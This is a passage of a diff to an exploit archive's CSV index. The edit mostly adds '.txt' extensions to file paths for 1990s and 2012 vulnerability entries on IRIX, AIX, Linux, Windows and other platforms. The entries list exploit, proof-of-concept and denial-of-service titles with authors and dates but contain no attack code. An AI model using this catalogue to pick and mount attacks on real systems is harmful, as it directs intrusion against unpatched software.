/usr/lib/netaddpr Vulnerability",1997-05-09,"Jaechul Choe",irix,local,0 -19261,platforms/netbsd_x86/local/19261,"NetBSD <= 1.3.2,SGI IRIX <= 6.5.1 at(1) Vulnerability",1998-06-27,Gutierrez,netbsd_x86,local,0 -19262,platforms/irix/local/19262,"SGI IRIX <= 6.2 cdplayer Vulnerability",1996-11-21,"Yuri Volobuev",irix,local,0 +19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2,SGI IRIX <= 6.5.1 at(1) Vulnerability",1998-06-27,Gutierrez,netbsd_x86,local,0 +19262,platforms/irix/local/19262.txt,"SGI IRIX <= 6.2 cdplayer Vulnerability",1996-11-21,"Yuri Volobuev",irix,local,0 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0 19264,platforms/php/webapps/19264.txt,"MyTickets 1 to 2.0.8 Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0 19265,platforms/windows/dos/19265.py,"Total Video Player 1.31 .m3u Crash PoC",2012-06-18,0dem,windows,dos,0 19266,platforms/windows/remote/19266.py,"Ezhometech Ezserver 6.4 Stack Overflow Exploit",2012-06-18,modpr0be,windows,remote,0 19267,platforms/irix/local/19267.c,"SGI IRIX <= 6.3 -xrm Buffer Overflow Vulnerability",1997-05-27,"David Hedley",irix,local,0 -19268,platforms/irix/local/19268,"SGI IRIX 5.3 Cadmin Vulnerabilities",1996-08-06,"Grant Kaufmann",irix,local,0 -19269,platforms/irix/local/19269,"SGI IRIX <= 6.0.1 colorview Vulnerability",1995-02-09,"Dave Sill",irix,local,0 +19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin Vulnerabilities",1996-08-06,"Grant Kaufmann",irix,local,0 +19269,platforms/irix/local/19269.txt,"SGI IRIX <= 6.0.1 colorview Vulnerability",1995-02-09,"Dave Sill",irix,local,0 19270,platforms/linux/local/19270.c,"Debian Linux 2.0 - Super Syslog Buffer Overflow Vulnerability",1999-02-25,c0nd0r,linux,local,0 19271,platforms/linux/dos/19271.c,"Linux kernel 2.0 TCP Port DoS Vulnerability",1999-01-19,"David Schwartz",linux,dos,0 -19272,platforms/linux/local/19272,"Linux kernel 2.2 ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0 +19272,platforms/linux/local/19272.txt,"Linux kernel 2.2 ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0 19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0 19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df Vulnerability",1997-05-24,"David Hedley",irix,local,0 19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0 @@ -16626,12 +16626,12 @@ id,file,description,date,author,platform,type,port 19277,platforms/irix/local/19277.c,"SGI IRIX <= 6.2 eject Vulnerability (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX <= 10.20,IBM AIX <= 4.1.5 connect() Denial of Service Vulnerability",1997-03-05,"Cahya Wirawan",hp-ux,dos,0 19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console Vulnerability",1996-02-02,"David J Meltzer",linux,local,0 -19280,platforms/irix/local/19280,"SGI IRIX <= 6.2 fsdump Vulnerability",1996-12-03,"Jaechul Choe",irix,local,0 +19280,platforms/irix/local/19280.txt,"SGI IRIX <= 6.2 fsdump Vulnerability",1996-12-03,"Jaechul Choe",irix,local,0 19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview Vulnerability",1999-05-28,"Chris Evans",linux,local,0 19282,platforms/linux/remote/19282.c,"Linux kernel 2.0 Sendmail Denial of Service Vulnerability",1999-05-28,"Michal Zalewski",linux,remote,0 19283,platforms/linux/local/19283.c,"Slackware Linux 3.1 - Buffer Overflow Vulnerability",1997-03-04,Solar,linux,local,0 19284,platforms/linux/local/19284.c,"Armidale Software Yapp Conferencing System 2.2 - Buffer Overflow Vulnerability",1998-01-20,satan,linux,local,0 -19285,platforms/linux/local/19285,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow Vulnerability (1)",1997-05-27,zgv,linux,local,0 +19285,platforms/linux/local/19285.txt,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow Vulnerability (1)",1997-05-27,zgv,linux,local,0 19286,platforms/linux/local/19286.c,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow Vulnerability (2)",1997-05-27,"Solar Designer",linux,local,0 19287,platforms/aix/local/19287.c,"IBM AIX <= 4.3 infod Vulnerability",1998-11-21,"Repent Security Inc",aix,local,0 19288,platforms/windows/remote/19288.py,"HP Data Protector Client EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0 @@ -16643,13 +16643,13 @@ id,file,description,date,author,platform,type,port 19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 - XSS",2012-06-20,"Henry Hoggard",php,webapps,0 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,metasploit,windows,remote,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd Vulnerability",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0 -19298,platforms/multiple/remote/19298,"SGI IRIX 6.2 cgi-bin wrap Vulnerability",1997-04-19,"J.A. Gutierrez",multiple,remote,0 -19299,platforms/multiple/remote/19299,"SGI IRIX <= 6.3 cgi-bin webdist.cgi Vulnerabilty",1997-05-06,anonymous,multiple,remote,0 -19300,platforms/aix/local/19300,"IBM AIX <= 4.2.1 snap Insecure Temporary File Creation Vulnerability",1999-02-17,"Larry W. Cashdollar",aix,local,0 +19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin wrap Vulnerability",1997-04-19,"J.A. Gutierrez",multiple,remote,0 +19299,platforms/multiple/remote/19299.txt,"SGI IRIX <= 6.3 cgi-bin webdist.cgi Vulnerabilty",1997-05-06,anonymous,multiple,remote,0 +19300,platforms/aix/local/19300.txt,"IBM AIX <= 4.2.1 snap Insecure Temporary File Creation Vulnerability",1999-02-17,"Larry W. Cashdollar",aix,local,0 19301,platforms/linux/remote/19301.c,"Linux kernel 2.0.33 IP Fragment Overlap Vulnerability",1998-04-17,"Michal Zalewski",linux,remote,0 19302,platforms/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH Vulnerability",1998-01-19,Solar,linux,local,0 -19303,platforms/multiple/remote/19303,"SGI IRIX <= 6.4 cgi-bin handler Vulnerability",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 -19304,platforms/irix/local/19304,"SGI IRIX <= 6.4 inpview Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 +19303,platforms/multiple/remote/19303.txt,"SGI IRIX <= 6.4 cgi-bin handler Vulnerability",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 +19304,platforms/irix/local/19304.txt,"SGI IRIX <= 6.4 inpview Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk Vulnerability",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir Buffer Overflow & Insecure Temporary File Creation Vulnerabilities",1997-10-29,"BM ERS Team",aix,local,0 19307,platforms/aix/local/19307.c,"IBM AIX <= 4.2 ping Buffer Overflow Vulnerability",1997-07-21,"Bryan P. Self",aix,local,0 @@ -16658,7 +16658,7 @@ id,file,description,date,author,platform,type,port 19310,platforms/irix/local/19310.c,"SGI IRIX <= 6.4 login Vulnerability",1997-05-26,"David Hedley",irix,local,0 19311,platforms/linux/local/19311.c,"RedHat Linux 4.2,SGI IRIX <= 6.3,Solaris <= 2.6 mailx Vulnerability (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 19312,platforms/linux/local/19312.c,"RedHat Linux 4.2,SGI IRIX <= 6.3,Solaris <= 2.6 mailx Vulnerability (2)",1998-06-25,segv,linux,local,0 -19313,platforms/irix/local/19313,"SGI IRIX <= 6.4 netprint Vulnerability",1997-01-04,"Yuri Volobuev",irix,local,0 +19313,platforms/irix/local/19313.txt,"SGI IRIX <= 6.4 netprint Vulnerability",1997-01-04,"Yuri Volobuev",irix,local,0 19314,platforms/linux/local/19314.c,"RedHat Linux 5.0/5.1/5.2,Slackware Linux <= 3.5 klogd Buffer Overflow Vulnerability (1)",1999-02-26,"Michal Zalewski",linux,local,0 19315,platforms/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2,Slackware Linux <= 3.5 klogd Buffer Overflow Vulnerability (2)",1999-02-26,"Esa Etelavuori",linux,local,0 19316,platforms/irix/remote/19316.c,"SGI IRIX <= 6.5.2 nsd Vulnerability",1999-05-31,"Jefferson Ogata",irix,remote,0 @@ -16670,7 +16670,7 @@ id,file,description,date,author,platform,type,port 19323,platforms/windows/local/19323.c,"URL Hunter Buffer Overflow DEP Bypass",2012-06-21,Ayrbyte,windows,local,0 19324,platforms/php/webapps/19324.txt,"traq 2.3.5 - Multiple Vulnerabilities",2012-06-21,AkaStep,php,webapps,0 19325,platforms/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",php,webapps,0 -19326,platforms/solaris/local/19326,"Sun Solaris 7.0 procfs Vulnerability",1999-03-09,"Toomas Soome",solaris,local,0 +19326,platforms/solaris/local/19326.txt,"Sun Solaris 7.0 procfs Vulnerability",1999-03-09,"Toomas Soome",solaris,local,0 19327,platforms/solaris/remote/19327.c,"Sun Solaris <= 2.5.1 rpc.statd rpc Call Relaying Vulnerability",1999-06-07,anonymous,solaris,remote,0 19328,platforms/windows/dos/19328.txt,"Qutecom Softphone 2.2.1 Heap Overflow DoS/Crash Proof of Concept",2012-06-22,"Debasish Mandal",windows,dos,0 19329,platforms/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps,0 @@ -16689,41 +16689,41 @@ id,file,description,date,author,platform,type,port 19342,platforms/solaris/local/19342.c,"Solaris <= 2.5.1 kcms Buffer Overflow Vulnerability (2)",1998-12-24,UNYUN,solaris,local,0 19343,platforms/solaris/local/19343.c,"Solaris <= 2.5.1 rsh socket descriptor Vulnerability",1997-06-19,"Alan Cox",solaris,local,0 19344,platforms/aix/local/19344.sh,"IBM AIX <= 3.2.5 IFS Vulnerability",1994-04-02,anonymous,aix,local,0 -19345,platforms/aix/local/19345,"IBM AIX <= 4.2.1 lquerypv Vulnerability",1996-11-24,Aleph1,aix,local,0 +19345,platforms/aix/local/19345.txt,"IBM AIX <= 4.2.1 lquerypv Vulnerability",1996-11-24,Aleph1,aix,local,0 19346,platforms/freebsd/local/19346.c,"FreeBSD <= 3.1,Solaris <= 2.6 Domain Socket Vulnerability",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 19347,platforms/irix/local/19347.c,"SGI IRIX <= 6.3 pset Vulnerability",1997-07-17,"Last Stage of Delirium",irix,local,0 -19348,platforms/aix/remote/19348,"IBM AIX <= 3.2.5 login(1) Vulnerability",1996-12-04,anonymous,aix,remote,0 -19349,platforms/irix/local/19349,"SGI IRIX <= 6.4 rmail Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 +19348,platforms/aix/remote/19348.txt,"IBM AIX <= 3.2.5 login(1) Vulnerability",1996-12-04,anonymous,aix,remote,0 +19349,platforms/irix/local/19349.txt,"SGI IRIX <= 6.4 rmail Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 19350,platforms/solaris/local/19350.sh,"Solaris <= 2.5.1 License Manager Vulnerability",1998-10-21,"Joel Eriksson",solaris,local,0 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports Vulnerability",1994-02-02,transit,irix,local,0 -19353,platforms/irix/local/19353,"SGI IRIX <= 6.4 suid_exec Vulnerability",1996-12-02,"Yuri Volobuev",irix,local,0 -19354,platforms/aix/local/19354,"SGI IRIX 5.1/5.2 sgihelp Vulnerability",1996-12-02,anonymous,aix,local,0 -19355,platforms/irix/local/19355,"SGI IRIX <= 6.4 startmidi Vulnerabilty",1997-02-09,"David Hedley",irix,local,0 -19356,platforms/irix/local/19356,"SGI IRIX <= 6.3 Systour and OutOfBox Vulnerabilities",1996-10-30,"Tun-Hui Hu",irix,local,0 +19353,platforms/irix/local/19353.txt,"SGI IRIX <= 6.4 suid_exec Vulnerability",1996-12-02,"Yuri Volobuev",irix,local,0 +19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp Vulnerability",1996-12-02,anonymous,aix,local,0 +19355,platforms/irix/local/19355.txt,"SGI IRIX <= 6.4 startmidi Vulnerabilty",1997-02-09,"David Hedley",irix,local,0 +19356,platforms/irix/local/19356.txt,"SGI IRIX <= 6.3 Systour and OutOfBox Vulnerabilities",1996-10-30,"Tun-Hui Hu",irix,local,0 19357,platforms/irix/dos/19357.sh,"SGI IRIX 6.2 SpaceWare Vulnerability",1996-10-30,"J.A. Guitierrez",irix,dos,0 -19358,platforms/irix/local/19358,"SGI IRIX <= 6.4 xfsdump Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 -19359,platforms/windows/local/19359,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability",1999-03-10,"Cybermedia Software Private Limited",windows,local,0 +19358,platforms/irix/local/19358.txt,"SGI IRIX <= 6.4 xfsdump Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 +19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability",1999-03-10,"Cybermedia Software Private Limited",windows,local,0 19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4,RedHat Linux 4.0 vsyslog() Buffer Overflow Vulnerability",1997-12-21,"Solar Designer",linux,local,0 -19361,platforms/windows/remote/19361,"Microsoft IIS 3.0/4.0 Double Byte Code Page Vulnerability",1999-06-24,Microsoft,windows,remote,0 +19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 Double Byte Code Page Vulnerability",1999-06-24,Microsoft,windows,remote,0 19362,platforms/sco/local/19362.c,"SCO Open Server <= 5.0.5 XBase Buffer Overflow Vulnerabilities",1999-06-14,doble,sco,local,0 -19363,platforms/multiple/remote/19363,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing Vulnerability",1999-06-07,"JesĂşs LĂłpez de Aguileta",multiple,remote,0 -19364,platforms/netware/local/19364,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability",1999-04-09,dreamer,netware,local,0 -19365,platforms/netware/remote/19365,"Novell Netware 4.1/4.11 SP5B NDS Default Rights Vulnerability",1999-04-09,"Simple Nomad",netware,remote,0 +19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing Vulnerability",1999-06-07,"JesĂşs LĂłpez de Aguileta",multiple,remote,0 +19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability",1999-04-09,dreamer,netware,local,0 +19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights Vulnerability",1999-04-09,"Simple Nomad",netware,remote,0 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay Vulnerability",1999-06-15,"Robert Lister",multiple,dos,0 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,metasploit,windows,remote,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0 .x/5.0 - Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMWare 1.0.1 - Buffer Overflow Vulnerability",1999-06-25,funkysh,linux,local,0 -19372,platforms/windows/dos/19372,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability",1999-06-28,"J D Glaser",windows,dos,0 +19372,platforms/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability",1999-06-28,"J D Glaser",windows,dos,0 19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5 / FreeBSD <= 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux <= 6.1 - Lsof Buffer Overflow Vulnerability (1)",1999-02-17,c0nd0r,linux,local,0 19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD <= 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux <= 6.1 - Lsof Buffer Overflow Vulnerability (2)",1999-02-17,Zhodiac,linux,local,0 -19376,platforms/windows/local/19376,"Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability",1999-03-08,"Fabien Royer",windows,local,0 -19377,platforms/multiple/dos/19377,"Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 -19378,platforms/multiple/dos/19378,"Ipswitch IMail 5.0 LDAP Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 -19379,platforms/multiple/dos/19379,"Ipswitch IMail 5.0 IMonitor Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 -19380,platforms/multiple/dos/19380,"Ipswitch IMail 5.0/6.0 Web Service Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 +19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability",1999-03-08,"Fabien Royer",windows,local,0 +19377,platforms/multiple/dos/19377.txt,"Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 +19378,platforms/multiple/dos/19378.txt,"Ipswitch IMail 5.0 LDAP Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 +19379,platforms/multiple/dos/19379.txt,"Ipswitch IMail 5.0 IMonitor Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 +19380,platforms/multiple/dos/19380.txt,"Ipswitch IMail 5.0/6.0 Web Service Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 19381,platforms/php/webapps/19381.php,"SugarCRM CE <= 6.3.1 ""unserialize()"" PHP Code Execution",2012-06-23,EgiX,php,webapps,0 -19382,platforms/multiple/dos/19382,"Ipswitch IMail 5.0 Whois32 Daemon Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 -19383,platforms/multiple/remote/19383,"Qbik WinGate Standard <= 3.0.5 Log Service Directory Traversal Vulnerability",1999-02-22,eEYe,multiple,remote,0 +19382,platforms/multiple/dos/19382.txt,"Ipswitch IMail 5.0 Whois32 Daemon Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 +19383,platforms/multiple/remote/19383.txt,"Qbik WinGate Standard <= 3.0.5 Log Service Directory Traversal Vulnerability",1999-02-22,eEYe,multiple,remote,0 19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 DJVU Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19386,platforms/php/webapps/19386.txt,"UCCASS <= 1.8.1 - Blind SQL Injection Vulnerability",2012-06-24,dun,php,webapps,0 @@ -16744,72 +16744,72 @@ id,file,description,date,author,platform,type,port 19408,platforms/php/webapps/19408.txt,"Zend Framework Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 19409,platforms/windows/dos/19409.txt,"sielco sistemi winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow DoS Vulnerability",1999-02-22,Prizm,windows,dos,0 -19411,platforms/bsd/local/19411,"BSDI BSD/OS 4.0,FreeBSD 3.2,NetBSD 1.4 x86,OpenBSD 2.5 UFS Secure Level 1 Vulnerability",1999-07-02,Stealth,bsd,local,0 +19411,platforms/bsd/local/19411.txt,"BSDI BSD/OS 4.0,FreeBSD 3.2,NetBSD 1.4 x86,OpenBSD 2.5 UFS Secure Level 1 Vulnerability",1999-07-02,Stealth,bsd,local,0 19412,platforms/windows/local/19412.c,"Qbik WinGate 3.0 Registry Vulnerability",1999-02-22,Chris,windows,local,0 19413,platforms/windows/dos/19413.c,"Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (1)",1999-07-03,Coolio,windows,dos,0 19414,platforms/windows/dos/19414.c,"Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (2)",1999-07-03,klepto,windows,dos,0 19415,platforms/windows/dos/19415.c,"Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (3)",1999-04-06,"Rob Mosher",windows,dos,0 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server <= 3.6 SSL Buffer Overflow DoS Vulnerability",1999-07-06,"Arne Vidstrom",windows,dos,0 -19417,platforms/osx/local/19417,"Apple Mac OS <= 8 8.6 Weak Password Encryption Vulnerability",1999-07-10,"Dawid adix Adamski",osx,local,0 -19418,platforms/aix/local/19418,"IBM AIX <= 4.3.1 adb Vulnerability",1999-07-12,"GZ Apple",aix,local,0 +19417,platforms/osx/local/19417.txt,"Apple Mac OS <= 8 8.6 Weak Password Encryption Vulnerability",1999-07-10,"Dawid adix Adamski",osx,local,0 +19418,platforms/aix/local/19418.txt,"IBM AIX <= 4.3.1 adb Vulnerability",1999-07-12,"GZ Apple",aix,local,0 19419,platforms/linux/local/19419.c,"Linux kernel 2.0.37 Segment Limit Vulnerability",1999-07-13,Solar,linux,local,0 19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0 19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (2)",1999-07-13,jGgM,multiple,remote,0 -19422,platforms/linux/local/19422,"BMC Software Patrol <= 3.2.5 Patrol SNMP Agent File Creation/Permission Vulnerability",1999-07-14,"Andrew Alness",linux,local,0 +19422,platforms/linux/local/19422.txt,"BMC Software Patrol <= 3.2.5 Patrol SNMP Agent File Creation/Permission Vulnerability",1999-07-14,"Andrew Alness",linux,local,0 19423,platforms/multiple/dos/19423.c,"BSD/OS <= 4.0,FreeBSD <= 3.2,Linux kernel <= 2.3,NetBSD <= 1.4 Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0 19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1)",1999-07-19,"rain forest puppy",windows,remote,0 -19425,platforms/windows/local/19425,"Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 +19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0,SGI IRIX <= 6.5.4,SGI UNICOS <= 10.0 6 arrayd.auth Default Configuration Vulnerability",1999-07-19,"Last Stage of Delirium",multiple,remote,0 -19427,platforms/osx/local/19427,"Apple At Ease 5.0 Vulnerability",1999-05-13,"Tim Conrad",osx,local,0 +19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0 Vulnerability",1999-05-13,"Tim Conrad",osx,local,0 19428,platforms/linux/local/19428.c,"Samba Pre-2.0.5 Vulnerabilities",1999-07-21,"Gerald Britton",linux,local,0 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 ClearCase SUID Vulnerability",1999-05-02,Mudge,linux,local,0 -19430,platforms/multiple/local/19430,"GNU groff 1.11 a,HP-UX 10.0/11.0,SGI IRIX <= 6.5.3 Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 +19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a,HP-UX 10.0/11.0,SGI IRIX <= 6.5.3 Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 19431,platforms/php/webapps/19431.txt,"webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability",2012-06-28,dun,php,webapps,0 19432,platforms/jsp/webapps/19432.rb,"Openfire <= 3.6.0a Admin Console Authentication Bypass",2012-06-28,metasploit,jsp,webapps,0 19433,platforms/windows/local/19433.rb,"Apple QuickTime TeXML Stack Buffer Overflow",2012-06-28,metasploit,windows,local,0 -19434,platforms/osx/local/19434,"Quinn ""the Eskimo"" and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Vulnerability",1999-07-28,"Dawid adix Adamski",osx,local,0 +19434,platforms/osx/local/19434.txt,"Quinn ""the Eskimo"" and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Vulnerability",1999-07-28,"Dawid adix Adamski",osx,local,0 19435,platforms/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 VBA Shell Vulnerability",1999-07-29,BrootForce,windows,remote,0 -19436,platforms/hardware/dos/19436,"Check Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service Vulnerability",1999-07-29,"Lance Spitzner",hardware,dos,0 -19437,platforms/osx/local/19437,"ELS Screen to Screen 1.0 - Multiple Password Vulnerabilities",1999-07-29,"Prozaq of mSec",osx,local,0 -19438,platforms/osx/local/19438,"Ogopogo Autothenticate 1.1.5 Weak Password Encryption Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0 -19439,platforms/osx/local/19439,"Power On Software On Guard for MacOS 3.2 Emergency Password Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0 +19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service Vulnerability",1999-07-29,"Lance Spitzner",hardware,dos,0 +19437,platforms/osx/local/19437.txt,"ELS Screen to Screen 1.0 - Multiple Password Vulnerabilities",1999-07-29,"Prozaq of mSec",osx,local,0 +19438,platforms/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 Weak Password Encryption Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0 +19439,platforms/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 Emergency Password Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0 19440,platforms/windows/local/19440.c,"Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability",1999-07-30,"David Litchfield",windows,local,0 19441,platforms/hardware/remote/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service Attack",1999-07-30,"Mike Frantzen",hardware,remote,0 19442,platforms/windows/remote/19442.html,"Compaq Java Applet for Presario SpawnApp Vulnerability",1998-11-28,"Frank Farance",windows,remote,0 -19443,platforms/multiple/remote/19443,"Netscape Enterprise Server 3.51/3.6 JHTML View Source Vulnerability",1999-07-30,"David Litchfield",multiple,remote,0 -19444,platforms/hardware/remote/19444,"Network Security Wizards Dragon-Fire IDS 1.0 Vulnerability",1999-08-05,"Stefan Lauda",hardware,remote,0 -19445,platforms/windows/dos/19445,"Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability",1999-08-08,Narr0w,windows,dos,0 +19443,platforms/multiple/remote/19443.txt,"Netscape Enterprise Server 3.51/3.6 JHTML View Source Vulnerability",1999-07-30,"David Litchfield",multiple,remote,0 +19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 Vulnerability",1999-08-05,"Stefan Lauda",hardware,remote,0 +19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability",1999-08-08,Narr0w,windows,dos,0 19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS Vulnerability",1999-08-08,rpc,multiple,dos,0 19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4,OpenBSD <= 2.5,Solaris <= 7.0 profil(2) 